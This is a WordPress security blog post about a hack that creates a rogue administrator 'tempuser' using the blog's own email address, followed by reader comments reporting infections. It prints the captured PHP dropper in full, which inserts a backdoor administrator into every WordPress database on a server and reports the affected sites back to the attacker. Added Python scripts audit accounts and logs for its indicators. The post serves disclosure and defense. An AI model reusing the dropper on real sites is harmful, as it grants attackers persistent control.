Many whose WordPress website or blog was hacked noticed a new WordPress user, tempuser, with the email address support@wpwhitesecurity.com on their WordPress installation, and automatically assumed it was us.
In fact, lately we have been receiving a lot of emails from WordPress administrators asking us whether we hacked their website. I do not blame them, especially if they do not know about us, but first of all, please note that we do not engage in this type of activity. We promote WordPress security and raise awareness about it, as you can see from our WordPress security blog.
Deciphering the WordPress Hack Attack
Unfortunately we do not have much information about this type of WordPress hack attack. We have been in touch with several independent WordPress security professionals and with Sucuri as well, and all of us are sharing as much information as we can about this attack, but so far there is little to go on.
Creating a WordPress Administrator with WP White Security Email Address
The only thing we know so far is that the attackers are managing to upload the script below, which, when executed, creates the tempuser account (user_login wpupdatestream, nicename tempuser, as the script shows) with the WordPress administrator role. Once the user is created the attackers can log in to WordPress with it and tamper with the website or inject it with malware.
<?php
// Dropper as captured during the attack; reproduced here with line breaks and comments for readability, behaviour unchanged.
// Note: it relies on the mysql_* extension, which no longer exists on PHP 7 and later.
error_reporting(0);
// Liveness probe: a GET with ?check answers "pawet" (this request shows up in web server logs).
if(isset($_GET['check'])) { echo "pawet"; }
if(isset($_POST["v1"])) {
    // Database host, username and password arrive in the POST body as v1, v2 and v3.
    $link = mysql_connect($_POST["v1"], $_POST["v2"], $_POST["v3"]);
    // Enumerate every *_options table on the server, so every WordPress site sharing the database is hit.
    $query = "SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema NOT IN ( 'information_schema', 'performance_schema', 'mysql' )";
    $result = mysql_query($query);
    $tables_list = array();
    while ($line = mysql_fetch_array($result)) {
        if (strpos($line["table_name"],'_options') !== false) {
            $b = $line["table_schema"].".".$line["table_name"];
            $query2 = "select concat(option_value,'|%5%5%5') from ".$b." where option_name='siteurl'";
            $result2 = mysql_query($query2);
            $row = mysql_fetch_row($result2);
            if (strpos($row[0],'|%5%5%5') !== false) {
                $p = explode("|", $row[0]);
                $site_name = $p[0];
                $p = explode("_", $line["table_name"]);
                $table_p = $p[0]."_";
                $db = $line["table_schema"];
                array_push($tables_list,$b."<|>".$site_name."<|>".$table_p."<|>".$db);
            }
        }
    }
    foreach($tables_list as $aaa) {
        $list = explode("<|>", $aaa);
        $table_pref = $list[2];
        $site_name = $list[1];
        $db = $list[3];
        mysql_select_db($db);
        // Inserts the rogue account with the fixed ID 9192191 (login wpupdatestream, nicename tempuser).
        $query = "INSERT INTO `".$table_pref."users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`, `display_name`) VALUES ('9192191', 'wpupdatestream', '".base64_decode("JFAkQk5yZmE4eE1Memp0TVhFQjNaeC9IcnhjQXlmV21tLw==")."', 'tempuser', 'support@wpwhitesecurity.com', '0', 'Temp User')";
        mysql_query($query);
        // Grants administrator (plus WPML and BackWPup capabilities) and user_level 10 through two usermeta rows with fixed umeta_id values.
        $query = "INSERT INTO `".$table_pref."usermeta` (`umeta_id`,`user_id`,`meta_key`,`meta_value`) VALUES ('9192192', '9192191', '".$table_pref."capabilities', 'a:18:{s:13:\"administrator\";s:1:\"1\";s:34:\"wpml_manage_translation_management\";b:1;s:21:\"wpml_manage_languages\";b:1;s:41:\"wpml_manage_theme_and_plugin_localization\";b:1;s:19:\"wpml_manage_support\";b:1;s:29:\"wpml_manage_media_translation\";b:1;s:22:\"wpml_manage_navigation\";b:1;s:24:\"wpml_manage_sticky_links\";b:1;s:30:\"wpml_manage_string_translation\";b:1;s:33:\"wpml_manage_translation_analytics\";b:1;s:25:\"wpml_manage_wp_menus_sync\";b:1;s:32:\"wpml_manage_taxonomy_translation\";b:1;s:27:\"wpml_manage_troubleshooting\";b:1;s:31:\"wpml_manage_translation_options\";b:1;s:36:\"wpml_manage_woocommerce_multilingual\";b:1;s:37:\"wpml_operate_woocommerce_multilingual\";b:1;s:9:\"translate\";b:1;s:14:\"backwpup_admin\";b:1;}')";
        mysql_query($query);
        $query = "INSERT INTO `".$table_pref."usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES ('9192191', '9192191', '".$table_pref."user_level', '10')";
        mysql_query($query);
        // Confirms the insert and reports the affected site back to whoever called the script.
        $query3 = "select user_login from `".$table_pref."users` where ID=9192191";
        $result3 = mysql_query($query3);
        $line3 = mysql_fetch_row($result3);
        if($line3[0] == 'wpupdatestream') { echo $site_name."<|>wpupdatestream<|>p123123|new|"; }
    }
    mysql_close($link);
}
?>
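As an added example (not code from the original post or from WP White Security), the following Python audit shows the check an administrator would run against the database after reading the script above: list every account that holds administrator rights and flag the indicators the dropper leaves behind (the fixed user ID 9192191, the login wpupdatestream and nicename tempuser, the abused email address, and the fixed umeta_id values 9192191 and 9192192). It runs against a constructed SQLite stand-in for the wp_users and wp_usermeta tables; the sample rows, the table-prefix argument and the "administrator stored as the string '1' rather than the boolean WordPress writes" heuristic are assumptions of the example, not facts from the post.

```python
import re
import sqlite3

# Indicators taken from the dropper script quoted in the post.
IOC_USER_ID = 9192191
IOC_LOGINS = {"wpupdatestream", "tempuser"}
IOC_EMAIL = "support@wpwhitesecurity.com"
IOC_UMETA_IDS = {9192191, 9192192}

# A serialized PHP capabilities array granting "administrator", whether stored as
# s:1:"1" (what the dropper writes) or b:1 (what WordPress itself writes).
ADMIN_CAP_RE = re.compile(r's:13:"administrator";(?:s:1:"1"|b:1);')


def load_sample_db():
    """Constructed SQLite stand-in for wp_users / wp_usermeta (not a real dump)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE wp_users (
            ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT, user_nicename TEXT,
            user_email TEXT, user_status INTEGER, display_name TEXT);
        CREATE TABLE wp_usermeta (
            umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
        """
    )
    con.executemany(
        "INSERT INTO wp_users VALUES (?,?,?,?,?,?,?)",
        [
            (1, "alice", "$P$Bconstructedhash1", "alice", "alice@example.org", 0, "Alice"),
            (2, "bob", "$P$Bconstructedhash2", "bob", "bob@example.org", 0, "Bob"),
            # The row the dropper inserts (password hash replaced by a placeholder).
            (9192191, "wpupdatestream", "$P$Bconstructedhash3", "tempuser",
             "support@wpwhitesecurity.com", 0, "Temp User"),
        ],
    )
    con.executemany(
        "INSERT INTO wp_usermeta VALUES (?,?,?,?)",
        [
            (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
            (2, 1, "wp_user_level", "10"),
            (3, 2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
            (4, 2, "wp_user_level", "7"),
            # The two usermeta rows the dropper inserts, with its fixed umeta_id values.
            (9192192, 9192191, "wp_capabilities",
             'a:2:{s:13:"administrator";s:1:"1";s:14:"backwpup_admin";b:1;}'),
            (9192191, 9192191, "wp_user_level", "10"),
        ],
    )
    return con


def audit_admins(con, table_prefix="wp_"):
    """Return one finding per account with administrator rights; the reasons list holds
    every dropper indicator that matched (empty means: legitimate-looking, still review)."""
    users = con.execute(
        f"SELECT ID, user_login, user_nicename, user_email FROM {table_prefix}users"
    ).fetchall()
    findings = []
    for uid, login, nicename, email in users:
        rows = con.execute(
            f"SELECT umeta_id, meta_key, meta_value FROM {table_prefix}usermeta WHERE user_id = ?",
            (uid,),
        ).fetchall()
        meta = {key: value for _, key, value in rows}
        caps = meta.get(f"{table_prefix}capabilities", "")
        level = meta.get(f"{table_prefix}user_level", "")
        if not (ADMIN_CAP_RE.search(caps) or level == "10"):
            continue
        reasons = []
        if uid == IOC_USER_ID:
            reasons.append("user ID is the hard-coded 9192191 from the dropper")
        if login in IOC_LOGINS or nicename in IOC_LOGINS:
            reasons.append("login/nicename is wpupdatestream or tempuser")
        if email.lower() == IOC_EMAIL:
            reasons.append("email is the address abused by the dropper")
        if {umeta_id for umeta_id, _, _ in rows} & IOC_UMETA_IDS:
            reasons.append("usermeta rows carry the dropper's fixed umeta_id values")
        if 's:13:"administrator";s:1:"1";' in caps:
            reasons.append("administrator flag stored as string '1', not the boolean WordPress writes (weak indicator)")
        findings.append({"id": uid, "login": login, "email": email, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_admins(load_sample_db()):
        print(finding)
```

Against a live site the same two queries run unchanged on MySQL once the connection object is swapped; the table prefix comes from wp-config.php and must be passed in, because the dropper derives the prefix from the *_options table name exactly the way a defender has to.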
Why Is the WP White Security Email Address Used?
Good question. Most probably, when the author was writing this script he took the SQL example we used in our article How to Manually Add a WordPress Administrator to the Database using SQL Queries.
How Can WordPress Attackers Upload Such Script?
So far we do not have much information, but it could be many things. They can upload such a file by gaining FTP access because of weak passwords or an exploit on the server, or because they managed to gain root access to the web server through some old software, which could also be an old version of WordPress, a vulnerable plugin or a WordPress theme. For example, by exploiting the popular vulnerability in the RevSlider plugin discovered a few months back, hackers can gain the ability to write files to the web server. The options are endless, hence why you should at least always use strong passwords and ensure all the software you use is the latest version.
Monitor WordPress To Catch Hackers Red Handed
The above hack is a perfect answer to why you should monitor all the activity on your WordPress site and web server as well. Hence always make sure that all the software you run on your web server has logging enabled. If you have all the logs of your web server software and a WordPress monitoring solution such as the WP Activity Log plugin, you have a complete monitoring solution that allows you to track any suspicious behaviour before it becomes a security issue. Or, if your WordPress website has already been hacked, logging can also help you trace back how the attack happened and address the security flaw.
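As an added example (not code from the original post, nor from the WP Activity Log plugin), the Python script below shows the two checks the previous two sections argue for. Run over constructed web server access log lines in the common "combined" format, it flags requests to PHP files under wp-content/uploads (where WordPress never stores PHP, which is how a file uploaded through a plugin ends up executed), direct requests to unexpected files under wp-includes (the commenters report the dropper as wp-includes/t44.php) and the bare ?check probe the dropper answers with "pawet". Run over a constructed directory tree, it flags PHP-named files under uploads, including renamed .bak leftovers, and any file carrying literal strings from the dropper. The log format, the allow-list of core files a browser legitimately requests, the sample IP addresses, paths and file contents are all assumptions of the example.

```python
import os
import re
import shutil
import tempfile
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access log format (assumption: adapt to your server's LogFormat).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
PHP_EXT = (".php", ".phtml", ".php5")
UPLOAD_DIR = "/wp-content/uploads/"
# Core PHP files that browsers do request directly (heuristic allow-list; extend for your install).
WP_INCLUDES_OK = {"/wp-includes/js/tinymce/wp-tinymce.php", "/wp-includes/ms-files.php"}
# Literal strings present in the dropper quoted in the post.
DROPPER_SIGNATURES = (b'echo "pawet"', b"wpupdatestream",
                      b"JFAkQk5yZmE4eE1Memp0TVhFQjNaeC9IcnhjQXlmV21tLw==")

# Constructed sample log lines; the IPs are documentation ranges, not real visitors.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Feb/2016:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Feb/2016:10:00:02 +0000] "GET /wp-includes/js/tinymce/wp-tinymce.php?c=1 HTTP/1.1" 200 9000',
    '198.51.100.9 - - [10/Feb/2016:10:05:11 +0000] "GET /wp-includes/t44.php?check HTTP/1.1" 200 5',
    '198.51.100.9 - - [10/Feb/2016:10:05:12 +0000] "POST /wp-includes/t44.php HTTP/1.1" 200 61',
    '198.51.100.9 - - [10/Feb/2016:10:06:30 +0000] "GET /wp-content/uploads/2016/02/new_up.php HTTP/1.1" 200 0',
    '203.0.113.7 - - [10/Feb/2016:10:07:00 +0000] "GET /wp-content/uploads/2016/02/photo.jpg HTTP/1.1" 200 40211',
    'not a log line at all',
]


def suspicious_requests(log_lines):
    """Return one dict per request whose target matches the dropper's footprint."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash mid-scan
        url = urlsplit(m.group("target"))
        path = url.path
        if not path.lower().endswith(PHP_EXT):
            continue
        reasons = []
        if path.startswith(UPLOAD_DIR):
            reasons.append("PHP executed from the uploads directory")
        if path.startswith("/wp-includes/") and path not in WP_INCLUDES_OK:
            reasons.append("direct request to an unexpected file under wp-includes")
        # keep_blank_values: the dropper tests isset($_GET['check']), so a bare ?check counts.
        if "check" in parse_qs(url.query, keep_blank_values=True):
            reasons.append("'check' parameter: the dropper's liveness probe")
        if reasons:
            hits.append({"line": n, "ip": m.group("ip"), "method": m.group("method"),
                         "path": path, "reasons": reasons})
    return hits


def scan_docroot(docroot):
    """Walk a document root; return sorted (relative path, reasons) for suspicious files."""
    findings = []
    for dirpath, _, files in os.walk(docroot):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = "/" + os.path.relpath(full, docroot).replace(os.sep, "/")
            reasons = []
            # Also catches renamed leftovers such as *.php.xxxx.bak reported by commenters.
            if rel.startswith(UPLOAD_DIR) and ".php" in name.lower():
                reasons.append("PHP-named file inside wp-content/uploads")
            with open(full, "rb") as fh:
                data = fh.read()
            reasons += ["contains dropper string %r" % sig for sig in DROPPER_SIGNATURES if sig in data]
            if reasons:
                findings.append((rel, reasons))
    return sorted(findings)


def build_sample_docroot():
    """Constructed directory tree standing in for a WordPress document root."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    layout = {
        "wp-includes/version.php": b"<?php $wp_version = 'x.y';",
        "wp-includes/t44.php": b"<?php error_reporting(0); if(isset($_GET['check'])) { echo \"pawet\"; }",
        "wp-content/uploads/2016/02/photo.jpg": b"\xff\xd8\xff\xe0 constructed jpeg stub",
        "wp-content/uploads/2016/02/new_up.php": b"<?php // constructed placeholder, no payload",
        "wp-content/uploads/gravity_forms/tmp/_input_test.php.bak": b"constructed leftover",
    }
    for rel, data in layout.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
    return root


def demo():
    """Build the constructed tree, scan it, remove it, and return (request hits, file findings)."""
    root = build_sample_docroot()
    try:
        files = scan_docroot(root)
    finally:
        shutil.rmtree(root)
    return suspicious_requests(SAMPLE_LOG), files


if __name__ == "__main__":
    requests, files = demo()
    for hit in requests:
        print("log line %(line)d %(method)s %(path)s from %(ip)s: %(reasons)s" % hit)
    for path, reasons in files:
        print("file %s: %s" % (path, reasons))
```

Neither check needs the attacker's POST body, which access logs never record: the file path, the probe parameter and the rogue usermeta rows are enough to tie a log entry to a dropped file and to the account it created, which is the trail the post asks readers to preserve before cleaning up.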
In the meantime, if you have any more information about such attack please let us know by leaving a comment below or drop us an email on support@wpwhitesecurity.com.
36 comments
Hi guys,
This exact hack has happened to me, so thanks for the info!
Same user, and same email address. Wish I knew what the vulnerability is …
Hello Keely,
You’re welcome. Should you have any further information about the attack or need help from our end do not hesitate to get in touch.
Hey guys –
Somebody noticed we had a user on our site:
wpudatestream
with that email you show above. I checked on it, and it had admin privileges, so I changed it to have “NO ROLE” on our site currently while I followed up with y’all to see if this is still a hack?
Thanks!
Hello Scott,
Yes it is still a hack. You should try to dig deeper and see from where the user was generated. If you want further help with the forensics, please get in touch. We’d like to see what happened exactly and help you solve your issue.
How did you change them to no role? I have to do everything through my cPanel because I can't access my website.
There is “no role” in WordPress. The best thing is to delete the user. I would recommend you delete the user from the dashboard, hence first think about gaining access back to the website. You can reset the administrator’s password via phpMyAdmin or by using FTP.
I had the same thing happen to me
Curious what the vulnerability is/was – my site is still not back to normal
Hello David, you have to remove the infection for your site to return to normal. Considering the attacker was able to execute a PHP script with malicious code, it could be a remote code execution; else, if they managed to upload files, they could have gained access to your site’s files via other vulnerabilities in other network services, so it is better to audit the whole server.
Hi David,
I had to upload a fresh copy of the wp-includes folder, and some of my themes’ files were hacked, so uploaded fresh copies of those.
Install a security plugin such as iThemes Security – https://wordpress.org/plugins/better-wp-security/ – which can prevent uploads/changes to folders. And let you know when suspicious activity is going on.
Let me know if you need any help 🙂
Hello Keely,
Did you find the source of the problem though? I.e. just restoring a backup will only remove the infection but does not close the security flaw which was exploited, so the chances of getting hacked again are very high.
Me too.. Cleaning this up right now actually.. I did a search for “my site was hacked by support@wpwhitesecurity.com” and found this post.
Is there anything from these files that i’m deleting that could help you track this f#@&er down?
*also, as a side note, the CTA just below this form leads to a page not found (WSAL Notification Extension)
Hello Jeffrey,
Well, so far what we have in that post is all the information we have, so before deleting anything which you think might have been tampered with during the attack, or any logs or anything else, it would be great if you could forward them to us.
* Thanks for the CTA. Fixed.
I’m trying to clean up after the same attack. All of the js files had some script inserted into them. I have the bad code if you’re interested.
Hello Becky,
Yes please. Send it to me on robert@wpwhitesecurity.com. Thank you.
I have the same issue with my website. It was brought to my attention when Google notified me stating my site is suspected to contain malware and slapped a warning on my site, stopping people from viewing it. I have uploaded a previous backup but suspect the hack may have happened prior to my backup. I'm a little stuck with what to do next??? Any ideas?
Regards
David
Hello David,
Just send us an email on support@wpwhitesecurity.com and we will help you get sorted. Looking forward to hearing from you.
I also just got hacked by the same. I have done nothing to remove him; I don't know where to start or if you could use any information.
Hello Tammi,
What we have reported here is the “end result of a hack” i.e. what the hacker is doing to keep control of a WordPress website after exploiting the vulnerability. Which vulnerability did he exploit? It could be many so in your case you have to do a proper audit and find out. We can help you with that as well so feel free to get in touch.
We found the same user wpupdatestream and an image file pic.jpg. Inside that image file I found a JSON script with a base64 decoded string. I guess the hacker is playing from both sides (in and out).
What I did is, I searched for pic.jpg from the cPanel file manager and deleted everything, plus I deleted that user wpupdatestream (id=9192191) from the WordPress DB. Looks like it is clean now but we are not sure.
I just wanted to share with you.
Thanks
Janaki
Hello Janaki,
Thank you very much for sharing. The problem in these cases is that you cleaned the damage / changes that the hacker did but you did not close the vulnerability he / she exploited. This article explains the “side effects” of a hack, i.e. what the hacker did after exploiting a vulnerability. So in your case I would recommend you to do a proper audit and find out what happened. For future reference, you should keep an audit trail of what is happening on your WordPress. It will definitely be handy.
Hi,
I found a user a few weeks ago named “wpupdatestream” (email: support@wpwhitesecurity.com) in our user section. I couldn’t figure it out, but we had had a few other people working on the site recently and I figured one of them must have been doing something, so I simply deleted the user & all its content.
The other day, I logged in and the same user was back! I followed the instructions on this website:
http://odishajobseekers.com/did-you-see-wpupdatestream-user-in-your-wp_users-table/
So, I deleted the user AND the file “t44.php” from the wp-includes folder, which is the php file that contained the exact code you cited at the top of this post.
I’ve also reset our cPanel and FTP passwords & forced a reset for all our WP users.
So far, the user has not returned! Just wanted to let you know about that t44.php file.
Thanks Rob. Yes the problem though remains; how did the attacker gain access to create the file t44.php? Ideally we should find the source of the problem.
Did you find the source?
I want to know if some plugin or else was the way in?
Unfortunately we did not manage to gather much evidence so far. Should you have any information, please feel free to share it with us by sending us an email on support@wpwhitesecurity.com
I have a server running many websites that are inundated with this problem.
I suspect it is due to a plugin named “Gravity Forms”
Thanks for sharing the information. If you have any logs or payload that you can share with us, please send it via email on robert@wpwhitesecurity.com
I don't think it's Gravity Forms… I never used it, yet I've been hacked 🙁
Hello Karolina,
You don’t have to have gravity forms to be hacked. Please send us an email on support@wpwhitesecurity.com if you need any help from our end.
Oh, just got hacked by “you” guys… I had a user “support@wpwhitesecurity.com” and got blacklisted… as I am in the process of changing hosting it is quite annoying… as whatever they have inserted spread over other sites on the hosting… I am in deep poo I'd say ;/
I just had this too and saw the user:
9192191 wpupdatestream support@wpwhitesecurity.com
I currently have a Google slap on my site.
Every single JS file had appended malware on it as described here:
https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection.html
My host also found a few infections:
/home/wpbeaches/public_html/wp-content/uploads/gravity_forms/123-08f553b398a4b4c85cb1b2e1d4c3ce1b/tmp/_input__test.php..4ee4d9.bak
/home/wpbeaches/public_html/wp-content/uploads/gravity_forms/2-d79068d65f2d7213620970702262b9de/tmp/_input_5_wow.phtml.ad11fa.bak
Most notably Gravity forms.
I asked for a review from Google but it failed – still working through the mire
I also had this problem.
I checked my Uploads folder and found a php script inside a subfolder called: new_up.php
that had this script inside: http://pastebin.com/BvybRVSb
I removed the user from the database and restored 3 .js files that the hacker changed.
They were:
wp-admin/js/inline-edit-tax.js
wp-includes/js/colorpicker.js
wp-includes/js/imgareaselect/jquery.imgareaselect.js
Thanks for the feedback George. Would it be possible to send me a copy of the infected WordPress files to support@wpwhitesecurity.com?
This happened to me today too.
Our site was hacked with this user, post created.
Also created 5-6 .php files in plugins and uploads folder. Even changed the index.php file.
Hello Beamkiller,
Would it be possible to send us a copy of the infected index.php and the 5-6 .php files? Rename their extension to txt please so they are not blocked. Please send them to support@wpwhitesecurity.com and thank you in advance.
Hello,
My website is also hacked and I saw the same user on my user list. I have some doubts about the Ajax Comment Posting plugin. Is anyone using this plugin?
Thanks…
Hi Aykan,
Please note that what you’re seeing is the post exploitation result. If the plugin is not vulnerable as such, then that is not the issue. Can you send us a copy of the infected files to support@wpwhitesecurity.com? Thank you.